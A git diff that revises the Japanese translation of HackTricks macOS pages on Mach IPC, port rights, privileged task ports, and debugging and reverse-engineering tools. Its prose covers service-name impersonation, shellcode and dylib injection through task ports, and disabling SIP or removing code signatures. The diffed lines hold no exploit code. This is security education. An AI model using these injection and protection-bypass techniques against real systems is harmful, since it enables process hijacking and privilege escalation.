+XNUにおいて、Machはカーネルが通常処理する多くの重要な低レベル操作、例えばプロセッサスケジューリング、マルチタスク、および仮想メモリ管理を**担当しています**。 ### BSD @@ -29,11 +29,11 @@ XNUの**カーネル**は、**FreeBSD**プロジェクトから派生したか BSDとMachの相互作用を理解することは、異なる概念的枠組みのために複雑です。たとえば、BSDはプロセスを基本的な実行単位として使用しますが、Machはスレッドに基づいて動作します。この不一致は、**各BSDプロセスを1つのMachスレッドを含むMachタスクに関連付けることによってXNUで調整されます**。BSDのfork()システムコールが使用されると、カーネル内のBSDコードはMach関数を使用してタスクとスレッド構造を作成します。 -さらに、**MachとBSDはそれぞれ異なるセキュリティモデルを維持しています**:**Machの**セキュリティモデルは**ポート権**に基づいていますが、BSDのセキュリティモデルは**プロセス所有権**に基づいています。これら2つのモデルの不一致は、時折ローカル特権昇格の脆弱性を引き起こすことがあります。典型的なシステムコールに加えて、**ユーザースペースプログラムがカーネルと相互作用することを可能にするMachトラップもあります**。これらの異なる要素が組み合わさって、macOSカーネルの多面的でハイブリッドなアーキテクチャを形成しています。 +さらに、**MachとBSDはそれぞれ異なるセキュリティモデルを維持しています**:**Machの**セキュリティモデルは**ポート権**に基づいていますが、BSDのセキュリティモデルは**プロセス所有権**に基づいています。これら2つのモデルの間の不一致は、時折ローカル特権昇格の脆弱性を引き起こすことがあります。典型的なシステムコールに加えて、**ユーザースペースプログラムがカーネルと相互作用することを可能にするMachトラップもあります**。これらの異なる要素が組み合わさって、macOSカーネルの多面的でハイブリッドなアーキテクチャを形成しています。 ### I/O Kit - Drivers -I/O Kitは、XNUカーネル内のオープンソースのオブジェクト指向**デバイスドライバフレームワーク**であり、**動的にロードされるデバイスドライバ**を処理します。これにより、さまざまなハードウェアをサポートするために、カーネルにモジュラーコードを動的に追加できます。 +I/O Kitは、XNUカーネル内のオープンソースのオブジェクト指向**デバイスドライバフレームワーク**であり、**動的にロードされるデバイスドライバ**を処理します。これにより、モジュールコードをカーネルにオンザフライで追加でき、多様なハードウェアをサポートします。 {{#ref}} macos-iokit.md @@ -47,9 +47,9 @@ macos-iokit.md ## macOS Kernel Extensions -macOSは**カーネル拡張**(.kext)をロードすることに対して**非常に制限が厳しい**です。これは、そのコードが高い特権で実行されるためです。実際、デフォルトではバイパスが見つからない限り、ほぼ不可能です。 +macOSは**カーネル拡張**(.kext)をロードすることに対して**非常に制限が厳しい**です。これは、そのコードが高い特権で実行されるためです。実際、デフォルトではほぼ不可能です(バイパスが見つからない限り)。 -次のページでは、macOSがその**kernelcache**内でロードする`.kext`を回復する方法も見ることができます: +次のページでは、macOSが**kernelcache**内にロードする`.kext`を回復する方法も見ることができます: {{#ref}} macos-kernel-extensions.md diff --git a/src/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-ipc-inter-process-communication/README.md b/src/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-ipc-inter-process-communication/README.md index 19b597100..488391218 100644 --- a/src/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-ipc-inter-process-communication/README.md +++ b/src/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-ipc-inter-process-communication/README.md @@ -6,7 +6,7 @@ ### 基本情報 -Machはリソースを共有するための**最小単位**として**タスク**を使用し、各タスクは**複数のスレッド**を含むことができます。これらの**タスクとスレッドはPOSIXプロセスとスレッドに1:1でマッピングされます**。 +Machはリソースを共有するための**最小単位**として**タスク**を使用し、各タスクは**複数のスレッド**を含むことができます。これらの**タスクとスレッドはPOSIXプロセスとスレッドに1:1でマッピングされています**。 タスク間の通信はMach Inter-Process Communication (IPC)を介して行われ、一方向の通信チャネルを利用します。**メッセージはポート間で転送され**、ポートはカーネルによって管理される**メッセージキュー**のように機能します。 @@ -16,17 +16,17 @@ Machはリソースを共有するための**最小単位**として**タスク* ### ポート権限 -ポート権限は、タスクが実行できる操作を定義し、この通信の鍵となります。可能な**ポート権限**は以下の通りです([ここからの定義](https://docs.darlinghq.org/internals/macos-specifics/mach-ports.html)): +タスクが実行できる操作を定義するポート権限は、この通信の鍵となります。可能な**ポート権限**は([ここからの定義](https://docs.darlinghq.org/internals/macos-specifics/mach-ports.html)): -- **受信権限**は、ポートに送信されたメッセージを受信することを許可します。MachポートはMPSC(複数のプロデューサー、単一のコンシューマー)キューであり、システム全体で**各ポートに対して1つの受信権限**しか存在できません(パイプとは異なり、複数のプロセスが1つのパイプの読み取り端にファイルディスクリプタを保持できます)。 -- **受信権限を持つタスク**はメッセージを受信し、**送信権限を作成**することができ、メッセージを送信することができます。元々は**自分のタスクのみがポートに対して受信権限を持っています**。 +- **受信権限**は、ポートに送信されたメッセージを受信することを許可します。MachポートはMPSC(複数生産者、単一消費者)キューであり、システム全体で**各ポートに対して1つの受信権限**しか存在できません(パイプとは異なり、複数のプロセスが1つのパイプの読み取り端にファイルディスクリプタを保持できます)。 +- **受信権限を持つタスク**はメッセージを受信し、**送信権限を作成**することができ、メッセージを送信できます。元々は**自タスクのみがポートに対して受信権限を持っています**。 - **送信権限**は、ポートにメッセージを送信することを許可します。 - 送信権限は**クローン**可能で、送信権限を持つタスクはその権限をクローンし、**第三のタスクに付与**できます。 -- **一度だけ送信権限**は、ポートに1つのメッセージを送信し、その後消失します。 -- **ポートセット権限**は、単一のポートではなく、_ポートセット_を示します。ポートセットからメッセージをデキューすると、その中の1つのポートからメッセージがデキューされます。ポートセットは、Unixの`select`/`poll`/`epoll`/`kqueue`のように、複数のポートを同時にリッスンするために使用できます。 +- **一度だけの送信権限**は、ポートに1つのメッセージを送信し、その後消失します。 +- **ポートセット権限**は、単一のポートではなく**ポートセット**を示します。ポートセットからメッセージをデキューすると、その中の1つのポートからメッセージがデキューされます。ポートセットは、Unixの`select`/`poll`/`epoll`/`kqueue`のように、複数のポートを同時にリッスンするために使用できます。 - **デッドネーム**は実際のポート権限ではなく、単なるプレースホルダーです。ポートが破棄されると、ポートへのすべての既存のポート権限はデッドネームに変わります。 -**タスクは他のタスクに送信権限を転送**でき、メッセージを返送することが可能になります。**送信権限もクローン可能で、タスクはその権限を複製して第三のタスクに与えることができます**。これにより、**ブートストラップサーバー**と呼ばれる仲介プロセスと組み合わせて、タスク間の効果的な通信が可能になります。 +**タスクは他のタスクに送信権限を転送**でき、メッセージを返送することが可能になります。**送信権限もクローン可能で、タスクはその権限を複製して第三のタスクに与えることができます**。これにより、**ブートストラップサーバー**と呼ばれる中間プロセスを組み合わせることで、タスク間の効果的な通信が可能になります。 ### ファイルポート @@ -34,20 +34,20 @@ Machはリソースを共有するための**最小単位**として**タスク* ### 通信の確立 -#### ステップ: +#### 手順: 通信チャネルを確立するために、**ブートストラップサーバー**(macの**launchd**)が関与します。 1. タスク**A**が**新しいポート**を開始し、その過程で**受信権限**を取得します。 2. タスク**A**は、受信権限の保持者として、**ポートの送信権限を生成**します。 -3. タスク**A**は**ブートストラップサーバー**との**接続**を確立し、**ポートのサービス名**と**送信権限**をブートストラップ登録と呼ばれる手続きで提供します。 +3. タスク**A**は**ブートストラップサーバー**と**接続**を確立し、**ポートのサービス名**と**送信権限**をブートストラップ登録と呼ばれる手続きで提供します。 4. タスク**B**は**ブートストラップサーバー**と対話し、サービス名のブートストラップ**ルックアップ**を実行します。成功すると、**サーバーはタスクAから受け取った送信権限を複製し、タスクBに**送信します。 5. 送信権限を取得したタスク**B**は、**メッセージを作成**し、**タスクAに送信**することができます。 6. 双方向通信のために、通常タスク**B**は**受信**権限と**送信**権限を持つ新しいポートを生成し、**送信権限をタスクAに与えて**タスクBにメッセージを送信できるようにします(双方向通信)。 -ブートストラップサーバーは、タスクが主張するサービス名を**認証できません**。これは、**タスク**が任意のシステムタスクを**偽装する可能性がある**ことを意味し、例えば、誤って**認証サービス名を主張し、すべてのリクエストを承認する**ことができます。 +ブートストラップサーバーは、タスクが主張するサービス名を**認証できません**。これは、**タスク**が任意のシステムタスクを**なりすます**可能性があることを意味し、偽の**認証サービス名を主張し、すべてのリクエストを承認する**ことができます。 -その後、Appleは**システム提供サービスの名前**を安全な構成ファイルに保存し、**SIP保護された**ディレクトリに配置します:`/System/Library/LaunchDaemons`および`/System/Library/LaunchAgents`。各サービス名に加えて、**関連するバイナリも保存されます**。ブートストラップサーバーは、これらのサービス名の**受信権限を作成し保持します**。 +その後、Appleは**システム提供サービスの名前**を、**SIP保護された**ディレクトリにある安全な構成ファイルに保存します:`/System/Library/LaunchDaemons`および`/System/Library/LaunchAgents`。各サービス名に加えて、**関連するバイナリも保存されます**。ブートストラップサーバーは、これらのサービス名の**受信権限を作成し保持します**。 これらの事前定義されたサービスに対して、**ルックアッププロセスはわずかに異なります**。サービス名がルックアップされると、launchdはサービスを動的に開始します。新しいワークフローは次のようになります: @@ -57,13 +57,13 @@ Machはリソースを共有するための**最小単位**として**タスク* - launchdは**送信権限を複製し、タスクBに送信します**。 - タスク**B**は**受信**権限と**送信**権限を持つ新しいポートを生成し、**送信権限をタスクA**(svc)に与えて、タスクBにメッセージを送信できるようにします(双方向通信)。 -ただし、このプロセスは事前定義されたシステムタスクにのみ適用されます。非システムタスクは元の説明通りに動作し、偽装を許可する可能性があります。 +ただし、このプロセスは事前定義されたシステムタスクにのみ適用されます。非システムタスクは元の説明のように動作し続け、なりすましを許す可能性があります。 ### Machメッセージ [こちらで詳細情報を見つける](https://sector7.computest.nl/post/2023-10-xpc-audit-token-spoofing/) -`mach_msg`関数は、実質的にシステムコールであり、Machメッセージの送信と受信に使用されます。この関数は、送信されるメッセージを最初の引数として必要とします。このメッセージは`mach_msg_header_t`構造体で始まり、その後に実際のメッセージ内容が続きます。この構造体は以下のように定義されています: +`mach_msg`関数は、基本的にシステムコールであり、Machメッセージの送受信に使用されます。この関数は、送信されるメッセージを最初の引数として必要とします。このメッセージは、`mach_msg_header_t`構造体で始まり、その後に実際のメッセージ内容が続きます。この構造体は次のように定義されています: ```c typedef struct { mach_msg_bits_t msgh_bits; @@ -74,9 +74,9 @@ mach_port_name_t msgh_voucher_port; mach_msg_id_t msgh_id; } mach_msg_header_t; ``` -プロセスが _**受信権**_ を持っている場合、Machポートでメッセージを受信できます。逆に、**送信者**には _**送信**_ または _**一度だけ送信する権利**_ が付与されます。一度だけ送信する権利は、単一のメッセージを送信するためのもので、その後は無効になります。 +プロセスが _**受信権**_ を持っている場合、Machポートでメッセージを受信できます。逆に、**送信者**には _**送信**_ または _**一度だけ送信する権利**_ が付与されます。一度だけ送信する権利は、単一のメッセージを送信するためのもので、その後無効になります。 -簡単な **双方向通信** を実現するために、プロセスはメッセージの Mach **ヘッダー** に _返信ポート_ (**`msgh_local_port`**) と呼ばれる **machポート** を指定できます。ここで、メッセージの **受信者** はこのメッセージに **返信を送信** できます。**`msgh_bits`** のビットフラグを使用して、このポートに対して **一度だけ送信する権利** を導出し、転送することができます (`MACH_MSG_TYPE_MAKE_SEND_ONCE`)。 +簡単な **双方向通信** を実現するために、プロセスはメッセージの Mach **メッセージヘッダー** に _返信ポート_ (**`msgh_local_port`**) と呼ばれる **machポート** を指定できます。ここで、メッセージの **受信者** はこのメッセージに **返信を送信** できます。**`msgh_bits`** のビットフラグは、このポートに対して **一度だけ送信する** **権利** を導出し、転送することを **示す** ために使用できます (`MACH_MSG_TYPE_MAKE_SEND_ONCE`)。 > [!TIP] > この種の双方向通信は、リプレイを期待するXPCメッセージで使用されることに注意してください (`xpc_connection_send_message_with_reply` および `xpc_connection_send_message_with_reply_sync`)。しかし、**通常は異なるポートが作成され**、前述のように双方向通信を作成します。 @@ -89,7 +89,9 @@ mach_msg_id_t msgh_id; - `msgh_id`: このメッセージのIDで、受信者によって解釈されます。 > [!CAUTION] -> **machメッセージは \_machポート**\_ を介して送信され、これは **単一 +> **machメッセージは \_machポート**\_ を介して送信され、これは **単一の受信者**、**複数の送信者** の通信チャネルで、machカーネルに組み込まれています。**複数のプロセス** がmachポートに **メッセージを送信** できますが、いつでも **単一のプロセスのみが** そこから読み取ることができます。 + +### ポートの列挙 ```bash lsmp -p ``` @@ -97,7 +99,7 @@ lsmp -p ### コード例 -**送信者**がポートを**割り当て**、名前 `org.darlinghq.example` のために**送信権**を作成し、それを**ブートストラップサーバー**に送信する様子に注意してください。送信者はその名前の**送信権**を要求し、それを使用して**メッセージを送信**しました。 +**送信者**がポートを**割り当て**、名前 `org.darlinghq.example` のための**送信権**を作成し、それを**ブートストラップサーバー**に送信する様子に注意してください。送信者はその名前の**送信権**を要求し、それを使用して**メッセージを送信**しました。 {{#tabs}} {{#tab name="receiver.c"}} @@ -225,20 +227,21 @@ printf("Sent a message\n"); ### 特権ポート -- **ホストポート**: プロセスがこのポートに対して**送信**権限を持っている場合、**システム**に関する**情報**を取得できます(例: `host_processor_info`)。 -- **ホスト特権ポート**: このポートに対して**送信**権限を持つプロセスは、カーネル拡張を読み込むなどの**特権アクション**を実行できます。この**権限を得るにはプロセスがルートである必要があります**。 -- さらに、**`kext_request`** APIを呼び出すには、他の権利**`com.apple.private.kext*`**を持っている必要があり、これはAppleのバイナリにのみ付与されます。 +- **ホストポート**: プロセスがこのポートに対して**Send**権限を持っている場合、**システム**に関する**情報**を取得できます(例: `host_processor_info`)。 +- **ホスト特権ポート**: このポートに対して**Send**権限を持つプロセスは、カーネル拡張を読み込むなどの**特権アクション**を実行できます。この権限を得るには**プロセスがrootである必要があります**。 +- さらに、**`kext_request`** APIを呼び出すには、Appleのバイナリにのみ与えられる他の権限**`com.apple.private.kext*`**を持っている必要があります。 - **タスク名ポート**: _タスクポート_の特権のないバージョンです。タスクを参照しますが、制御することはできません。これを通じて利用可能な唯一のものは`task_info()`のようです。 -- **タスクポート**(別名カーネルポート)**:** このポートに対して送信権限を持つことで、タスクを制御することが可能です(メモリの読み書き、スレッドの作成など)。 -- `mach_task_self()`を呼び出して、呼び出しタスクのこのポートの**名前を取得**します。このポートは**`exec()`**を通じてのみ**継承されます**; `fork()`で作成された新しいタスクは新しいタスクポートを取得します(特別なケースとして、suidバイナリ内の`exec()`後にタスクも新しいタスクポートを取得します)。タスクを生成し、そのポートを取得する唯一の方法は、`fork()`を行いながら["ポートスワップダンス"](https://robert.sesek.com/2014/1/changes_to_xnu_mach_ipc.html)を実行することです。 +- **タスクポート**(別名カーネルポート)**:** このポートに対してSend権限を持つことで、タスクを制御することが可能です(メモリの読み書き、スレッドの作成など)。 +- `mach_task_self()`を呼び出して、呼び出し元タスクのこのポートの**名前**を取得します。このポートは**`exec()`**を通じてのみ**継承されます**; `fork()`で作成された新しいタスクは新しいタスクポートを取得します(特別なケースとして、suidバイナリ内の`exec()`後にもタスクは新しいタスクポートを取得します)。タスクを生成し、そのポートを取得する唯一の方法は、`fork()`を行いながら["ポートスワップダンス"](https://robert.sesek.com/2014/1/changes_to_xnu_mach_ipc.html)を実行することです。 - これらはポートにアクセスするための制限です(バイナリ`AppleMobileFileIntegrity`の`macos_task_policy`から): -- アプリが**`com.apple.security.get-task-allow`権限**を持っている場合、**同じユーザーのプロセスがタスクポートにアクセスできます**(通常はデバッグのためにXcodeによって追加されます)。**ノータリゼーション**プロセスは、これを製品リリースには許可しません。 +- アプリが**`com.apple.security.get-task-allow`権限**を持っている場合、**同じユーザーの**プロセスがタスクポートにアクセスできます(通常はデバッグのためにXcodeによって追加されます)。**ノータリゼーション**プロセスは、製品リリースではこれを許可しません。 - **`com.apple.system-task-ports`**権限を持つアプリは、カーネルを除く**任意の**プロセスの**タスクポートを取得できます**。古いバージョンでは**`task_for_pid-allow`**と呼ばれていました。これはAppleのアプリケーションにのみ付与されます。 -- **ルートは、**ハードンされた**ランタイムでコンパイルされていないアプリケーションのタスクポートにアクセスできます**(Apple製でないもの)。 +- **Rootは、**ハードンされた**ランタイムでコンパイルされていないアプリケーションのタスクポートにアクセスできます**(Apple製でないもの)。 ### タスクポート経由のスレッドへのシェルコード注入 -シェルコードを取得するには: +シェルコードを取得できます: + {{#ref}} ../../macos-apps-inspecting-debugging-and-fuzzing/arm64-basic-assembly.md @@ -498,13 +501,13 @@ gcc -framework Foundation -framework Appkit sc_inject.m -o sc_inject ``` ### スレッドを介したDylibインジェクション -macOSでは、**スレッド**は**Mach**または**posix `pthread` API**を使用して操作できます。前回のインジェクションで生成したスレッドはMach APIを使用して生成されたため、**posix準拠ではありません**。 +macOSでは、**スレッド**は**Mach**を介して、または**posix `pthread` API**を使用して操作できます。前回のインジェクションで生成したスレッドはMach APIを使用して生成されたため、**posix準拠ではありません**。 -**posix**準拠のAPIを使用する必要がなかったため、**コマンドを実行するためのシンプルなシェルコードを注入することが可能でした**。しかし、**より複雑なインジェクション**では、**スレッド**も**posix準拠である必要があります**。 +**シンプルなシェルコード**を注入してコマンドを実行することが可能だったのは、**posix**準拠のAPIを使用する必要がなかったからで、Machのみで動作したためです。**より複雑なインジェクション**では、**スレッド**も**posix準拠**である必要があります。 -したがって、**スレッドを改善するためには**、**`pthread_create_from_mach_thread`**を呼び出す必要があります。これにより、**有効なpthreadが作成されます**。次に、この新しいpthreadが**dlopenを呼び出して**システムから**dylibをロード**できるようになります。これにより、異なるアクションを実行するために新しいシェルコードを書くのではなく、カスタムライブラリをロードすることが可能です。 +したがって、**スレッドを改善するためには**、**`pthread_create_from_mach_thread`**を呼び出す必要があります。これにより、**有効なpthread**が作成されます。この新しいpthreadは、**dlopen**を呼び出してシステムから**dylib**を**ロード**できるため、異なるアクションを実行するために新しいシェルコードを書く代わりに、カスタムライブラリをロードすることが可能です。 -**例のdylibs**は以下にあります(例えば、ログを生成し、その後リスニングできるもの): +**例のdylibs**は次の場所にあります(例えば、ログを生成し、その後リスニングできるもの): {{#ref}} ../../macos-dyld-hijacking-and-dyld_insert_libraries.md @@ -800,7 +803,7 @@ gcc -framework Foundation -framework Appkit dylib_injector.m -o dylib_injector ### 基本情報 -XPCは、macOSおよびiOS上の**プロセス間通信**のためのフレームワークで、XNU(macOSで使用されるカーネル)を指します。XPCは、システム上の異なるプロセス間で**安全で非同期のメソッド呼び出し**を行うためのメカニズムを提供します。これはAppleのセキュリティパラダイムの一部であり、各**コンポーネント**がその仕事を行うために必要な**権限のみ**で実行される**特権分離アプリケーション**の**作成**を可能にし、侵害されたプロセスからの潜在的な損害を制限します。 +XPCは、macOSおよびiOS上のプロセス間通信のためのフレームワークで、XNU(macOSで使用されるカーネル)を意味します。XPCは、システム上の異なるプロセス間で**安全な非同期メソッド呼び出し**を行うためのメカニズムを提供します。これはAppleのセキュリティパラダイムの一部であり、各**コンポーネント**がその仕事を行うために必要な**権限のみ**で実行される**特権分離アプリケーション**の**作成**を可能にし、侵害されたプロセスからの潜在的な損害を制限します。 この**通信がどのように機能するか**、およびそれが**どのように脆弱である可能性があるか**についての詳細は、以下を確認してください: @@ -810,7 +813,7 @@ XPCは、macOSおよびiOS上の**プロセス間通信**のためのフレー ## MIG - Machインターフェースジェネレーター -MIGは、**Mach IPC**コード作成のプロセスを**簡素化するため**に作成されました。基本的に、指定された定義に基づいてサーバーとクライアントが通信するために必要なコードを**生成**します。生成されたコードが醜い場合でも、開発者はそれをインポートするだけで、彼のコードは以前よりもはるかにシンプルになります。 +MIGは、**Mach IPC**コード作成のプロセスを**簡素化するため**に作成されました。基本的に、指定された定義に基づいてサーバーとクライアントが通信するために必要なコードを**生成します**。生成されたコードが醜い場合でも、開発者はそれをインポートするだけで、彼のコードは以前よりもはるかにシンプルになります。 詳細については、以下を確認してください: diff --git a/src/macos-hardening/macos-security-and-privilege-escalation/macos-apps-inspecting-debugging-and-fuzzing/README.md b/src/macos-hardening/macos-security-and-privilege-escalation/macos-apps-inspecting-debugging-and-fuzzing/README.md index 30fa56bfb..57fe6b284 100644 --- a/src/macos-hardening/macos-security-and-privilege-escalation/macos-apps-inspecting-debugging-and-fuzzing/README.md +++ b/src/macos-hardening/macos-security-and-privilege-escalation/macos-apps-inspecting-debugging-and-fuzzing/README.md @@ -1,4 +1,4 @@ -# macOSアプリ - 検査、デバッグ、ファジング +# macOS アプリ - 検査、デバッグ、ファジング {{#include ../../../banners/hacktricks-training.md}} @@ -24,7 +24,7 @@ nm -m ./tccd # List of symbols ``` ### jtool2 & Disarm -ここから[**disarmをダウンロードできます**](https://newosxbook.com/tools/disarm.html)。 +You can [**download disarm from here**](https://newosxbook.com/tools/disarm.html). ```bash ARCH=arm64e disarm -c -i -I --signature /path/bin # Get bin info and signature ARCH=arm64e disarm -c -l /path/bin # Get binary sections @@ -84,11 +84,11 @@ ldid -S/tmp/entl.xml ### SuspiciousPackage [**SuspiciousPackage**](https://mothersruin.com/software/SuspiciousPackage/get.html) は、**.pkg** ファイル(インストーラー)を検査し、インストールする前にその内容を確認するのに役立つツールです。\ -これらのインストーラーには、マルウェア作成者が通常悪用する `preinstall` および `postinstall` bash スクリプトがあります。 +これらのインストーラーには、マルウェア作成者が通常悪用する `preinstall` および `postinstall` bash スクリプトが含まれています。 ### hdiutil -このツールは、Apple のディスクイメージ(**.dmg**)ファイルを**マウント**して、何かを実行する前に検査することを可能にします: +このツールは、Apple のディスクイメージ(**.dmg**)ファイルを**マウント**して、何かを実行する前にそれらを検査することを可能にします: ```bash hdiutil attach ~/Downloads/Firefox\ 58.0.2.dmg ``` @@ -105,14 +105,14 @@ It will be mounted in `/Volumes` ### Metadata > [!CAUTION] -> Objective-Cで書かれたプログラムは、[Mach-Oバイナリ](../macos-files-folders-and-binaries/universal-binaries-and-mach-o-format.md)にコンパイルされるときに**クラス宣言を保持します**。そのようなクラス宣言には、以下の名前とタイプが**含まれます**: +> Objective-Cで書かれたプログラムは、[Mach-O binaries](../macos-files-folders-and-binaries/universal-binaries-and-mach-o-format.md)にコンパイルされるときに**クラス宣言を保持します**。そのようなクラス宣言には以下が**含まれます**: - 定義されたインターフェース - インターフェースメソッド - インターフェースインスタンス変数 - 定義されたプロトコル -これらの名前は、バイナリのリバースエンジニアリングをより困難にするために難読化される可能性があることに注意してください。 +これらの名前は、バイナリのリバースエンジニアリングをより困難にするために難読化される可能性があります。 ### Function calling @@ -122,9 +122,9 @@ Objective-Cを使用するバイナリで関数が呼び出されると、コン この関数が期待するパラメータは次のとおりです: -- 最初のパラメータ(**self**)は、「**メッセージを受け取るクラスのインスタンスを指すポインタ**」です。簡単に言えば、メソッドが呼び出されるオブジェクトです。メソッドがクラスメソッドの場合、これはクラスオブジェクトのインスタンス(全体)になりますが、インスタンスメソッドの場合、selfはクラスのインスタンス化されたオブジェクトを指します。 -- 2番目のパラメータ(**op**)は、「メッセージを処理するメソッドのセレクタ」です。再度、簡単に言えば、これは**メソッドの名前**です。 -- 残りのパラメータは、メソッドに必要な**値**(op)です。 +- 最初のパラメータ(**self**)は「**メッセージを受け取るクラスのインスタンスを指すポインタ**」です。簡単に言えば、メソッドが呼び出されるオブジェクトです。メソッドがクラスメソッドの場合、これはクラスオブジェクトのインスタンス(全体)になりますが、インスタンスメソッドの場合、selfはクラスのインスタンス化されたオブジェクトを指します。 +- 2番目のパラメータ(**op**)は「メッセージを処理するメソッドのセレクタ」です。再度、簡単に言えば、これは**メソッドの名前**です。 +- 残りのパラメータは、メソッド(op)によって必要とされる**値**です。 この情報を**ARM64で`lldb`を使って簡単に取得する方法**をこのページで確認してください: @@ -136,13 +136,13 @@ x64: | **Argument** | **Register** | **(for) objc_msgSend** | | ----------------- | --------------------------------------------------------------- | ------------------------------------------------------ | -| **1st argument** | **rdi** | **self: メソッドが呼び出されるオブジェクト** | -| **2nd argument** | **rsi** | **op: メソッドの名前** | -| **3rd argument** | **rdx** | **メソッドへの1番目の引数** | -| **4th argument** | **rcx** | **メソッドへの2番目の引数** | -| **5th argument** | **r8** | **メソッドへの3番目の引数** | -| **6th argument** | **r9** | **メソッドへの4番目の引数** | -| **7th+ argument** |

rsp+
(スタック上)

| **メソッドへの5番目以降の引数** | +| **1st argument** | **rdi** | **self: object that the method is being invoked upon** | +| **2nd argument** | **rsi** | **op: name of the method** | +| **3rd argument** | **rdx** | **1st argument to the method** | +| **4th argument** | **rcx** | **2nd argument to the method** | +| **5th argument** | **r8** | **3rd argument to the method** | +| **6th argument** | **r9** | **4th argument to the method** | +| **7th+ argument** |

rsp+
(on the stack)

| **5th+ argument to the method** | ### Dump ObjectiveC metadata @@ -162,7 +162,7 @@ objdump --macho --objc-meta-data /path/to/bin ``` #### class-dump -[**class-dump**](https://github.com/nygard/class-dump/) は、ObjectiveC形式のコードでクラス、カテゴリ、およびプロトコルの宣言を生成するための元のツールです。 +[**class-dump**](https://github.com/nygard/class-dump/) は、ObjectiveC形式のコード内のクラス、カテゴリ、およびプロトコルの宣言を生成するための元のツールです。 古くてメンテナンスされていないため、正しく動作しない可能性があります。 @@ -193,7 +193,7 @@ Mem: 0x1000274cc-0x100027608 __TEXT.__swift5_capture ``` これらのセクションに保存されている情報についての詳細は、[**このブログ投稿**](https://knight.sc/reverse%20engineering/2019/07/17/swift-metadata.html)で見つけることができます。 -さらに、**Swiftバイナリにはシンボルが含まれている可能性があります**(たとえば、ライブラリはその関数を呼び出すためにシンボルを保存する必要があります)。**シンボルには通常、関数名と属性に関する情報が含まれています**が、見栄えが悪いため非常に便利であり、元の名前を取得できる「**デマンガラー**」があります。 +さらに、**Swiftバイナリにはシンボルが含まれている可能性があります**(例えば、ライブラリはその関数を呼び出すためにシンボルを保存する必要があります)。**シンボルには通常、関数名と属性に関する情報が含まれています**が、見栄えが悪いため非常に便利であり、元の名前を取得できる「**デマンガラー**」があります。 ```bash # Ghidra plugin https://github.com/ghidraninja/ghidra_scripts/blob/master/swift_demangler.py @@ -204,10 +204,10 @@ swift demangle ## ダイナミック分析 > [!WARNING] -> バイナリをデバッグするには、**SIPを無効にする必要があります**(`csrutil disable` または `csrutil enable --without debug`)またはバイナリを一時フォルダにコピーし、`codesign --remove-signature `で**署名を削除**するか、バイナリのデバッグを許可する必要があります([このスクリプト](https://gist.github.com/carlospolop/a66b8d72bb8f43913c4b5ae45672578b)を使用できます)。 +> バイナリをデバッグするには、**SIPを無効にする必要があります**(`csrutil disable`または`csrutil enable --without debug`)またはバイナリを一時フォルダにコピーし、`codesign --remove-signature `で**署名を削除する**か、バイナリのデバッグを許可する必要があります([このスクリプト](https://gist.github.com/carlospolop/a66b8d72bb8f43913c4b5ae45672578b)を使用できます)。 > [!WARNING] -> macOSで**システムバイナリをインストゥルメント**(例えば`cloudconfigurationd`)するには、**SIPを無効にする必要があります**(署名を削除するだけでは機能しません)。 +> macOSで**システムバイナリ**(例えば`cloudconfigurationd`)を**インスツルメント**するには、**SIPを無効にする必要があります**(署名を削除するだけでは機能しません)。 ### APIs @@ -218,21 +218,21 @@ macOSはプロセスに関する情報を提供するいくつかの興味深い ### Stackshot & microstackshots -**Stackshotting**は、プロセスの状態をキャプチャするための技術で、すべての実行中のスレッドのコールスタックを含みます。これは、デバッグ、パフォーマンス分析、特定の時点でのシステムの動作を理解するために特に有用です。iOSおよびmacOSでは、**`sample`**や**`spindump`**などのツールや方法を使用してstackshottingを実行できます。 +**Stackshotting**は、プロセスの状態をキャプチャするために使用される技術で、すべての実行中のスレッドのコールスタックを含みます。これは、デバッグ、パフォーマンス分析、特定の時点でのシステムの動作を理解するために特に便利です。iOSおよびmacOSでは、**`sample`**や**`spindump`**などのツールや方法を使用してstackshottingを実行できます。 ### Sysdiagnose -このツール(`/usr/bini/ysdiagnose`)は、基本的に`ps`、`zprint`などの数十の異なるコマンドを実行してコンピュータから多くの情報を収集します。 +このツール(`/usr/bini/ysdiagnose`)は、`ps`、`zprint`などの異なるコマンドを実行してコンピュータから多くの情報を収集します。 -**root**として実行する必要があり、デーモン`/usr/libexec/sysdiagnosed`には、`com.apple.system-task-ports`や`get-task-allow`などの非常に興味深い権限があります。 +**root**として実行する必要があり、デーモン`/usr/libexec/sysdiagnosed`は、`com.apple.system-task-ports`や`get-task-allow`などの非常に興味深い権限を持っています。 そのplistは`/System/Library/LaunchDaemons/com.apple.sysdiagnose.plist`にあり、3つのMachServicesを宣言しています: - `com.apple.sysdiagnose.CacheDelete`: /var/rmp内の古いアーカイブを削除します - `com.apple.sysdiagnose.kernel.ipc`: 特殊ポート23(カーネル) -- `com.apple.sysdiagnose.service.xpc`: `Libsysdiagnose` Obj-Cクラスを介したユーザーモードインターフェース。辞書内に3つの引数を渡すことができます(`compress`、`display`、`run`) +- `com.apple.sysdiagnose.service.xpc`: `Libsysdiagnose` Obj-Cクラスを介したユーザーモードインターフェース。辞書内に3つの引数(`compress`、`display`、`run`)を渡すことができます。 -### 統一ログ +### 統合ログ MacOSは、アプリケーションを実行して**何をしているのか**を理解する際に非常に役立つ多くのログを生成します。 @@ -250,19 +250,19 @@ Hopperの左パネルでは、バイナリのシンボル(**Labels**)、手
-コードオブジェクトを右クリックすると、そのオブジェクトへの**参照**や**参照元**を見ることができ、名前を変更することもできます(これはデコンパイルされた擬似コードでは機能しません): +コードオブジェクトを右クリックすると、そのオブジェクトへの**参照**や**そのオブジェクトからの参照**を見ることができ、名前を変更することもできます(これはデコンパイルされた擬似コードでは機能しません):
